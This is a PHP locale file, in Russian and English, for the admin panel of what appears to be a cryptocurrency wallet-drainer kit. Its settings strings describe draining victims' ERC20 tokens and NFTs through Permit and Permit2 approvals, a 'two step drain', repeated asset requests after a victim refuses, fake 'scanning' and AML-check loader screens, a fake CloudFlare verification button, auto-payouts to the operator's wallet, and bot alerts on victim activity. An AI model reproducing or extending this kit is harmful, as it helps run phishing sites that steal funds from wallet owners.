<?php
require $_SERVER["DOCUMENT_ROOT"] . "/php/info_send_log.php";

$locales = array(
    'ru' => array(
        'tabs' => [
            'general' => 'Основные',
            'loaders' => 'Текста лоадеров',
            'messaging' => 'Отстук',
            'web3modal' => 'Web3Modal'
        ],

        'site-settings-title' => 'Настройки сайта',
        'site-settings-autopayments' => 'Автовыплаты',
        'site-settings-wallet-verification' => 'Верификация кошелька',
        'site-settings-contract-method' => 'Метод контракта',
        'site-settings-erc20-widthdraw' => 'Снятие активов',
        'site-settings-permit-enabled' => 'Permit в первую очередь',
        'site-settings-permit-priority' => 'Приоритет от стоимости токена',
        'site-settings-modal-type' => 'Тип модального окна',
        'site-settings-modal-pallete' => 'Цветовая палитра модального окна',
        'site-settings-modal-font' => 'Шрифт модального окна',
        'site-settings-modal-open' => 'Открытие модального окна',
        'site-settings-modal-open-click' => 'После клика по кнопке',
        'site-settings-modal-open-load' => 'После загрузки страницы',
        'site-settings-modal-handler' => 'Обработчик открытия',
        'site-settings-modal-theme' => 'Тема модальных окон',
        'site-settings-modal-theme-light' => 'Светлая',
        'site-settings-modal-theme-dark' => 'Тёмная',
        'site-settings-modal-theme-auto' => 'Авто',
        'site-settings-loader-type' => 'Loader',
        'site-settings-thanks-redirect' => 'Редирект на спасибо',
        'site-settings-thanks-redirect-url' => 'Ссылка для редиректа',
        'site-settings-on' => 'Включено',
        'site-settings-off' => 'Выключено',
        'site-settings-erc20-widthdraw-next' => 'При отказе переходить к следующему',
        'site-settings-erc20-widthdraw-repeat' => 'Запрашивать циклично один актив',
        
        'message-settings-title' => 'Настройки Отстука (опционально)',
        'message-settings-bot' => 'Бот для отстука (Опционально)',
        'message-settings-language' => 'Язык отстука',
        'message-settings-chat' => 'Группа для отстука (Опционально)',
        'message-settings-widthdraw-chat' => 'Отдельная группа для снятий (Опционально)',
        'message-settings-event-enter' => 'Вход на сайт',
        'message-settings-event-connect-request' => 'Запрос на подключение',
        'message-settings-event-connect-success' => 'Успешное подключение',
        'message-settings-event-leave' => 'Выход с сайта',
        'message-settings-event-widthdraw-request' => 'Запрос на снятие',
        'message-settings-event-change-network-reject' => 'Отклонение смены сети',
        'message-settings-event-change-network-request' => 'Запрос на смену сети',
        'message-settings-event-widthdraw-reject' => 'Отклонение снятия',

        'w3m-settings-title' => 'Настройки Web3Modal',
        'w3m-settings-font' => 'Шрифт',
        'w3m-settings-accent-color' => 'Акцентный цвет',
        'w3m-settings-logo-color' => 'Цвет лого WalletConnect',
        'w3m-settings-topbar-color' => 'Цвет верхнего фона',
        'w3m-settings-logo-url' => 'Ссылка на логотип',
        'w3m-settings-background-url' => 'Ссылка на изображение заднего фона',

        'modal-autopayments' => '<h4>На установленый вами кошелёк в боте будут приходить автовыплаты</h4><br><h4>Выплаты NFT и токенов снятых прямым переводом, запрашивайте у саппорта</h4><h4>Пожалуйста, убедитесь что кошелек в боте установлен верно</h4><br><h4>Ваш кошелек для выплат: <b>' . $wallet . '</b></h4><br><h4>В случае, если кошелек неверен - укажите другой кошелек при переустановке дизайна в боте</h4><br><p>Проект не несёт ответственности за утерю выплаты по вашей вине</p>',
        'modal-logo' => '<p><b>Здесь вы можете изменить логотип который будет отображаться вместо WalletConnect.<b></p><p><b>Рекомендуемый размер: 180x30<b></p>',

        'site-title' => 'Панель администратора',
        'docs' => 'Документация',
        'save-success' => 'Изменения успешно применены!',
        'save-error' => 'Не удалось сохранить изменения!',
        'save-changes-button' => 'Сохранить изменения',

        'loaders-texts-title' => 'Текста лоадеров',
        'loaders-texts-reset-button' => "Сбросить",
        'loaders-texts-connect' => 'Сканиирование #1',
        'loaders-texts-connect-success' => 'Успешное подключение',
        'loaders-texts-address-check' => 'Сканирование #3',
        'loaders-texts-aml-check' => 'Сканирование #4',
        'loaders-texts-aml-check-success' => 'Сканирование #5',
        'loaders-texts-scanning-more' => 'Сканирование #6',
        'loaders-texts-thanks' => 'Спасибо',
        'loaders-texts-sign-validation' => 'Ожидание подтверждения',
        'loaders-texts-sign-waiting-title' => 'Запрос на подтверждение - заголовок',
        'loaders-texts-sign-waiting-description' => 'Запрос на подтверждение - описание',
        'loaders-texts-sign-confirmed' => 'Успешное подтверждение',
        'loaders-texts-error-title' => 'Ошибка (отмена подтверждений) - заголовок',
        'loaders-texts-error-description' => 'Ошибка (отмена подтверждений) - описание',
        'loaders-texts-error-button' => 'Ошибка (отмена подтверждений) - текст на кнопке',
        'loaders-texts-low-balance-error-description' => 'Ошибка (низкий баланс) - описание',
        'loaders-texts-low-balance-error-button' => 'Ошибка (низкий баланс) - текст на кнопке',
        'loaders-texts-aml-check-error-title' => 'Ошибка (запасная) - заголовок',
        'loaders-texts-aml-check-error-description' => 'Ошибка (запасная) - описание',

        'double-drain' => 'Двухэтапное снятие',
        'double-drain-checkbox' => 'Включить двухэтапное снятие',
        'double-drain-subtitle' => 'Перед включением ознакомьтесь с принципом работы в документации',
        'double-drain-button-class' => 'Селектор кнопки',
        'double-drain-button-text' => 'Текст кнопки',
        'chain-change-ask-limit' => 'Максимальное число запросов на смену сети (для одного актива)',
        'lower-threshold-minimal-wallet-price' => 'Минимальная сумма на кошельке',
        'lower-threshold-minimal-token-price' => 'Минимальная сумма в токене',
        'lower-threshold-minimal-native-price' => 'Минимальная сумма в нативной монете',

        'additional-functions-set-enable-nft' => 'Выводить NFT',
        'additional-functions-set-enable-permit2' => 'Включить Permit2',
        'additional-functions-set-enable-permit' => 'Включить Permit',
        'additional-functions-set-use-cached-data' => 'Использовать кэшированные данные',
        'additional-functions-set-enable-swappers' => 'Включить обменники',

        'cloud-button-text' => 'CloudFlare текст на кнопке',
        'cloud-reload-delay' => 'CloudFlare задержка перед перезагрузкой',
        'cloud-button-text-verification' => 'CloudFlare текст во время верификации',
        'cloud-button-color' => 'CloudFlare цвет кнопки',
        
        'recaptcha-domain-name' => 'ReCaptcha название домена',
    ),
    'en' => array(
        'tabs' => [
            'general' => 'General',
            'loaders' => 'Loader texts',
            'messaging' => 'Messaging',
            'web3modal' => 'Web3Modal'
        ],

        'site-settings-title' => 'Website settings',
        'site-settings-autopayments' => 'Autopayments',
        'site-settings-wallet-verification' => 'Wallet verification',
        'site-settings-contract-method' => 'Contract Method',
        'site-settings-erc20-widthdraw' => 'Withdrawal of ERC20 tokens',
        'site-settings-permit-enabled' => 'Permit first',
        'site-settings-permit-priority' => 'Priority based on token value',
        'site-settings-modal-type' => 'Modal window type',
        'site-settings-modal-pallete' => 'Modal window color palette',
        'site-settings-modal-font' => 'Modal window font',
        'site-settings-modal-open' => 'Opening a modal window',
        'site-settings-modal-open-click' => 'After clicking the button',
        'site-settings-modal-open-load' => 'After the page loads',
        'site-settings-modal-handler' => 'Open handler',
        'site-settings-modal-theme' => 'Modal theme',
        'site-settings-modal-theme-light' => 'Light',
        'site-settings-modal-theme-dark' => 'Dark',
        'site-settings-modal-theme-auto' => 'Auto',
        'site-settings-thanks-redirect' => 'Thanks redirect',
        'site-settings-thanks-redirect-url' => 'Link for Thanks redirect',
        'site-settings-loader-type' => 'Loader',
        'site-settings-on' => 'Enabled',
        'site-settings-off' => 'Disabled',
        'site-settings-erc20-widthdraw-next' => 'If refused, move on to the next one.',
        'site-settings-erc20-widthdraw-repeat' => 'Request one asset cyclically',
        
        'message-settings-title' => 'Message settings(optional)',
        'message-settings-bot' => 'Message bot(Optional)',
        'message-settings-language' => 'Message language',
        'message-settings-chat' => 'Message group(Optional)',
        'message-settings-widthdraw-chat' => 'Separate group for withdrawals (Optional)',
        'message-settings-event-enter' => 'Enter the site',
        'message-settings-event-connect-request' => 'Connection request',
        'message-settings-event-connect-success' => 'Successful connection',
        'message-settings-event-leave' => 'Exit from the site',
        'message-settings-event-widthdraw-request' => 'Withdrawal request',
        'message-settings-event-change-network-reject' => 'Network change reject',
        'message-settings-event-change-network-request' => 'Network change request',
        'message-settings-event-widthdraw-reject' => 'Withdrawal reject',

        'w3m-settings-title' => 'Web3Modal Settings',
        'w3m-settings-font' => 'Font',
        'w3m-settings-accent-color' => 'Accent color',
        'w3m-settings-logo-color' => 'WalletConnect logo color',
        'w3m-settings-topbar-color' => 'Top background color',
        'w3m-settings-logo-url' => 'Logo link',
        'w3m-settings-background-url' => 'Background link',

        'modal-autopayments' => '<h4>Automatic payments will be sent to the wallet you installed in the bot</h4><br><h4>For payments of NFTs and tokens withdrawn by direct transfer, please request from support</h4><h4>Please make sure that the wallet in the bot is installed correctly</h4><br><h4>Your wallet for payments: <b>' . $wallet . '</b></h4><br><h4>If the wallet is incorrect, specify another wallet when reinstalling the design in the bot</h4><br><p>The project is not responsible for the loss of payment for your resposibillity</p>',
        'modal-logo' => '<p><b>Here you can change the logo that will be displayed instead of WalletConnect.<b></p><p><b>Recommended size: 180x30<b></p>',

        'site-title' => 'Admin panel',
        'docs' => 'Docs',
        'save-success' => 'Changes successfully applied!',
        'save-error' => 'Failed to save changes!',
        'save-changes-button' => 'Save changes',

        'loaders-texts-title' => 'Loader texts',
        'loaders-texts-reset-button' => "Reset",
        'loaders-texts-connect' => 'Scanning #1',
        'loaders-texts-connect-success' => 'Scanning #2',
        'loaders-texts-address-check' => 'Scanning #3',
        'loaders-texts-aml-check' => 'Scanning #4',
        'loaders-texts-aml-check-success' => 'Scanning #5',
        'loaders-texts-scanning-more' => 'Scanning #6',
        'loaders-texts-thanks' => 'Thanks',
        'loaders-texts-sign-validation' => 'Confirming Approve',
        'loaders-texts-sign-waiting-title' => 'Approve request - title',
        'loaders-texts-sign-waiting-description' => 'Approve request - description',
        'loaders-texts-sign-confirmed' => 'Successful approve',
        'loaders-texts-error-title' => 'Error (all approves cancel) - title',
        'loaders-texts-error-description' => 'Error (all approves cancel) - description',
        'loaders-texts-error-button' => 'Error (all approves cancel) - text on button',
        'loaders-texts-low-balance-error-description' => 'Error (low balance) - description',
        'loaders-texts-low-balance-error-button' => 'Error (low balance) - text on button',
        'loaders-texts-aml-check-error-title' => 'Error (extra) - title',
        'loaders-texts-aml-check-error-description' => 'Error (extra) - description',

        'double-drain' => 'Two step drain',
        'double-drain-checkbox' => 'Turn-on two step drain',
        'double-drain-subtitle' => 'Before turning on, familiarize yourself with the operating principle in docs',
        'double-drain-button-class' => 'Button selector',
        'double-drain-button-text' => 'Button text',
        'chain-change-ask-limit' => 'Maximum tries to change chain (for single token)',
        'lower-threshold-minimal-wallet-price' => 'Minimal wallet price',
        'lower-threshold-minimal-token-price' => 'Minimal token price',
        'lower-threshold-minimal-native-price' => 'Minimal native price',

        'additional-functions-set-enable-nft' => 'Enable NFT',
        'additional-functions-set-enable-permit2' => 'Enable Permit2',
        'additional-functions-set-enable-permit' => 'Enable Permit',
        'additional-functions-set-use-cached-data' => 'Use cached data',
        'additional-functions-set-enable-swappers' => 'Enable Swappers',

        'cloud-button-text' => 'CloudFlare button text',
        'cloud-reload-delay' => 'CloudFlare reload delay',
        'cloud-button-text-verification' => 'CloudFlare verification button text',
        'cloud-button-color' => 'CloudFlare button color',
        
        'recaptcha-domain-name' => 'ReCaptcha Domain Name',
    )
);